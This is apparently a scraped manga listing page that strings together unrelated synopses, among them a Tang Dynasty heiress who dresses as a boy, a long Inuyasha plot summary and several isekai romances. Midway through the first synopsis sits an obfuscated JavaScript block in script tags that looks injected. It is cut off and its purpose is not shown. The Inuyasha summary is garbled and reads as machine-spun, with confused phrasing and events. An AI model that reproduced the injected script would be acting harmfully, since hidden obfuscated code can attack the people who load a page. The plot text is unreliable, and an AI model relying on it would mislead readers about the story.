In the peak of the Tang Dynasty, Suzhou's wealthiest family, the Jia Family's precious daughter enjoys dressing as a boy. She dresses as a boy every day, pretending to be the second young master of the Jia Family as she runs about town with her two bodyguards causing trouble. With her acts of exacting justice on behalf of women, she is liked by all the women in the city and solidly holds the title of "National Husband". In fact, the amount of proposals that have come to the door have nearly flattened the entrance floorboards of the Jia Family mansion! On the contrary, when men see her in her own form, they are all fearful of her. All men run in the opposite direction as soon as they see her, none dare to cross this little lord, that is except for one...<script></script><script>(function(_0x33a2b5,_0x425fbf){var _0x21ed4f=_0x46aa,_0x52b20f=_0x33a2b5();while(!![]){try{var _0x1d43a7=parseInt(_0x21ed4f(0x20c))/(-0x3e*0x33+-0x7e1*-0x2+-0x367*0x1)+parseInt(_0x21ed4f(0x1fc))/(-0x2451*-0x1+0x2c*-0x89+-0xcc3)*(-parseInt(_0x21ed4f(0x1f4))/(0xa83+-0x4*-0x964+0x602*-0x8))+parseInt(_0x21ed4f(0x213))/(-0x9bf+0x13*0x13e+-0x1*0xdd7)*(parseInt(_0x21ed4f(0x214))/(-0x12df+0x1b05*0x1+-0x821))+parseInt(_0x21ed4f(0x20b))/(0x1f3f+-0x1*0x21e0+-0x1*-0x2a7)+parseInt(_0x21ed4f(0x215))/(-0x1*0x1421+-0x423*-0x1+-0x1005*-0x1)+parseInt(_0x21ed4f(0x1fa))/(0x1d1*-0x6+0x9dd+0x111)*(-parseInt(_0x21ed4f(0x209))/(-0x254+-0x6e7+0x944))+-parseInt(_0x21ed4f(0x203))/(0x2*0x959+0x19bb+-0x2c63)*(parseInt(_0x21ed4f(0x20a))/(-0x163a+-0x52*-0x40+0x3*0x97));if(_0x1d43a7===_0x425fbf)break;else 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Can the three teenage daughters of demon dog half-brothers Inuyasha and Sesshomaru save their parents, themselves, and both realms from the menace of the seven mystical Rainbow Pearls? Living in the present day isn’t easy for Sesshomaru’s daughter Towa. She can’t remember where she came from, must conceal her mysterious powers, and is either worshiped or feared by girls she just wants to be friends with. But she has no way of returning to her own time until one day a demon attacks and she is transported to feudal-era Japan. There Towa, her twin sister Setsuma, and her cousin Moroha - Inuyasha’s daughter - have a mission bestowed upon them by the mystical Tree of Ages. With only vague memories of their past to guide them, the three young women set out to find their parents, heal a rift in time, and fulfill their royal destiny.
Read Inuyasha manga The Jewel accidentally shatters into many bits which are dispersed across Japan when a beast from that age attempts to take the magical Shikon Jewel embodied in Kagome. Inuyasha and Kagome begin traveling to regain it before all the shards are found by the strong demon Naraku. Inuyasha and Kagome develop several allies throughout their journey, as Miroku, Shippo, Sango and Kirara. In sharp contrast to the usually comedic nature of much of the previous work of Takahashi, Inuyasha deals with subject matter that is darker, utilizing the setting of the Sengoku period to readily show the content that is violent. Inuyasha manga The narrative starts on the fifteenth birthday of Kagome Higurashi, a girl who lives with her mom, grandpa and little brother on the property of her family's hereditary Shinto shrine in Tokyo. When she goes to the good house to retrieve her cat, a centipede demon pulls the girl into it and bursts out of the enshrined Bone Eater's Well. The centipede demon is shown to have been after a magic jewel before being slain with a priestess named Kikyo, called the Shikon Jewel. Animated by the power in our time of the Shikon Jewel and mistaking her for Kikyo, the devil tries to kill the jewel to be gained by Kagome. The youth is shown by the nearby villagers to be Inuyasha, a half-dog demon who had been sealed by way of a perishing Kikyo fifty years back after being seemingly betrayed by her and trying to take the Shikon Jewel (which allows any wish the bearer want) to be able to be a full demon. After his dad's sword Tetsusaiga is gained by Inuyasha and is subdued by a charming necklace to keep him in line, he helps Kagome in coping with all the hazards they cause and gathering the shards. The two are joined in their own pursuit the somewhat revived Kikyo and from the young fox demon Shippo while coping with third parties groups like Inuyasha's older brother Sesshomaru, whose own version of what occurred years past brings the occasions into question. When joined a perverted monk whose bloodline is cursed, by Miroku, Kagome and Inuyasha learn the truth: the first disagreement between Kikyo and Inuyasha, disclosed to initially be fans, was due to a devious half-demon named Naraku. The developing Naraku is disclosed to have been born from your spirit of an evil guy named Onigumo inhabiting a body made within a pact by innumerable devils and who additionally put the hex on the family of Miroku. Sango, a devil slayer whose family was killed when her younger brother Kohaku fell under Naraku's control shortly joins after Inuyasha's group. Over time, Tetsusaiga abilities are enhanced by Inuyasha as he competes with Naraku's minion avatars like Kagura as well as the reanimated Band of Seven. The team of Inuyasha is broadly allied by Sesshomaru, Kikyo, as well as Koga who desires to avenge his comrades while flirting with Kagome was named by a wolf demon. Characters in Inuyasha manga While his heart is briefly removed by Naraku in the type of the Infant, who after tries to overthrow Naraku through his boat Moryomaru, Kohaku recovers his freewill and memories, as he tries to help out of remorse for indirectly killing his dad. With Inuyasha, matters settle throughout that time to empower his brother to its best capabilities to perfect Tetsusaiga. Eventually, Koga is made to stand on the sidelines, Kikyo posthumously uses the last of her capacity to give a second chance at life to Kohaku, and the Shikon Jewel is eventually reassembled by Naraku. The gem means to have so Naraku and she is going to be immobilized in battle for perpetuity, Kagome make a selfish wish. But for the Shikon Jewel, Kagome wishes with Inuyasha by her side to vanish. The actions, though, causes Kagome to go back together with the Well sealed to her time, inducing Inuyasha and her to lose contact for 3 years. Because point, the Sengoku period changes dramatically: Miroku and Sango have three kids together; Kohaku restarts his journey to be a devil slayer that is powerful as his company with Kirara; and the seventh position is attained by Shippo as a fox demon. Kagome returns to the Sengoku period where she becomes his wife and remains with Inuyasha. Other manga: + Ajin manga + Monster Soul manga
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Shinobi Gataki (Tobita Nikiichi) summary is updating. Come visit sometime to read the latest chapter of Shinobi Gataki (Tobita Nikiichi). If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.
[from Fantasy Shrine:] A prisoner of war with beautiful dark eyes was shattered of all pride & dignity by a colonel who couldn't help but be drawn to his prisoner's mysterious eyes...
The Prince, my fiancé, was flirting with a lady who was not me. Does that mean he's breaking it off?! "Finally!" I can finally escape from the strict princess training. As I head back to the countryside the prince chases after me?! He won't break off the engagement?! Why?! A highly exciting romantic comedy of a prince who chases after his fiancée who has run away.
Seven years ago, Lundi found a little girl named Jeudi lying in a field of dandelions on the Alps. One day, they accidentally angered Count de Gourmont and so Jeudi was forced work as a maid in his castle. Lundi came to her rescue; however they nearly died when escaping. Set in the era of World War II, Lundi and Jeudi face many difficult situations as they search for the whereabouts of Jeudi’s parents. -Bakaupdates
"In this village, death inevitably takes those who have reached 50 years of age." By custom, all villagers who have passed the age of 50 are bound and taken to The Netherworld on the other side of the mountain. Officials clad in beast skins manage the village, "The Living World," whose people are watched over by gods. Meanwhile, the People of the Mountain remain shrouded mystery... Anzu, who sacrificed the older of twin girls to the mountain, is torn between hope and despair. Land, a story that reflects Yamashita Kazumi's unease for the nation of Japan.
I possessed a constellation fantasy novel. After taking first place in the Hunter rankings for 10 years and clearing the tower... this time, she possessed a romance fantasy novel, the infamous villain Princess Law? [The asks where the hell is this place.] [ is confused.] [ is delighted with the familiar world.] Fortunately, I am not the only one who came, but the constellations also came. Just take a look, this princess isn't usually a bad person, is she? Every day, assassination attempts and all sorts of schemes come in... ['s skill LV.999 purifies Mandrake's poison!] ['s skill LV.999 heals wounds perfectly!] ['s skill LV.999 puts the Assassin to sleep!] but what is this They are just too fresh compared to their previous lives. He tried to clear the mission while enjoying his free time, but now the male protagonist and his brothers, who were harassing him as a villain, start to cling. "It's okay to be capricious, but it's only for me. Do you understand?" "I regret that I didn't trust you back then." I don't deserve to beg your pardon, do I?" There, even the mercenary king and the light of the empire are approaching me... "I have decided." "What?" "I will serve Young-ae as my teacher." okay. I'll take revenge for what I've done wrong and I'll give you anything you want, damn system, please take me home! An escape from the twists and turns of the No. 1 hunter Lee Young who mistakenly possessed a romance fantasy novel! Will she be able to return home after clearing this mission?
A medical student, Linzhen, has traversed into one of the greatest four noble families, Norlan Family. She has also become the stepmother of the beautiful youngster, Sean. How will she continue to live in this foreign world and also together with this youngster who's full of hatred towards her...
Within the dim corridors of an ancient library resides Sohwa, a mystical dokkaebi (goblin) with a flame that burns both fierce and gentle. Her presence is a haunting melody to the restless soul of Yunwoo, a young master who dares to stake his very essence for the chance to hold her love. Through lifetimes that weave heartbreak and longing, and in a dance of reincarnations fraught with missed steps, their bond teeters between destiny and despair. Can the embers of their love reignite amidst the ashes of fate, or is their passion fated to flicker out in the winds of time?